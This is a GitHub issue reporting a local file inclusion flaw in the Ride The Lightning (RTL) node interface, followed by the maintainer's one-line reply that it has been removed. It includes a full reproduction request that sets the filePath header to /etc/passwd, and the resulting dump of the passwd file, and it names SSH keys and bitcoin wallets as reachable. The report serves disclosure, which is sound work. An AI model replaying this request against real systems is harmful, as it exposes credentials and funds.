### ISSUE TITLE
Local File Inclusion (LFI) vulnerability 

### ISSUE THREAD

**Issue by w4cky** [ShahanaFarooqui/RTL#37]
**Describe the bug**
While working with RTL I found a dangerous vulnerability that allows you to read files from the whole file of the system, to which the user has the rights.  The attacker can read system files. Np /etc/passwd, bitcoin wallets, configs  but also SSH keys and anything else that an RTL application user can access.

**Donate BTC Address: bc1q2et0jd2xwcpy87dz7uneq7g93gstfhllcwvyn6**
**Secure Payment lightning network node**:  025033fdfd6f4e0e909776f0e8250c997f75de9cb11466e3a36fb8e6c7a1abcbb9@145.239.17.238:9735

**To Reproduce**

request:
GET /api/rtlconf/lndconfig HTTP/1.1
Host: X
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/plain, */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://X
filePath: **/etc/passwd**
Authorization: Bearer XXXXXX
Connection: close
If-None-Match: W/"a3-lad6RzESS3xRyaXX+GHKPvU5Bdg"

response:
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Authorization, filePath
Access-Control-Allow-Methods: GET, POST, PATCH, PUT, DELETE, OPTIONS
Content-Type: application/json; charset=utf-8
Content-Length: 1924
ETag: W/"784-aFmsdkp3rNj/4dbQ64Zv8XXwZ8"
Date: Fri, 18 Jan 2019 10:17:16 GMT
Connection: close

"root:x:0:0:root:/root:/bin/bash=true\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin=true\nbin:x:2:2:bin:/bin:/usr/sbin/nologin=true\nsys:x:3:3:sys:/dev:/usr/sbin/nologin=true\nsync:x:4:65534:sync:/bin:/bin/sync=true\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin=true\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin=true\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin=true\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin=true\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin=true\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin=true\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin=true\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin=true\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin=true\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin=true\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin=true\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin=true\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin=true\nsystemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false=true\nsystemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false=true\nsystemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false=true\nsystemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false=true\nsyslog:x:104:108::/home/syslog:/bin/false=true\n_apt:x:105:65534::/nonexistent:/bin/false=true\nlxd:x:106:65534::/var/lib/lxd/:/bin/false=true\nmessagebus:x:107:111::/var/run/dbus:/bin/false=true\nuuidd:x:108:112::/run/uuidd:/bin/false=true\ndnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false=true\nsshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin=true\nmichal:x:1000:1000:michal,,,:/home/michal:/bin/bash=true\nevaporator-production:x:999:999::/home/evaporator-production:=true\nbitcoin:x:111:117::/var/lib/bitcoin:/bin/false=true\nmichal2:x:1001:1002:,,,:/home/michal2:/bin/bash=true\n"

**Screenshots**
![image](https://user-images.githubusercontent.com/25501286/51380871-fd078300-1b12-11e9-8b18-add1141c0fb5.png)

**Your environment**
Ride The Lightning (Alpha) 

**Additional context**

**Comment by ShahanaFarooqui** [comment]
Removed the vulnerability.
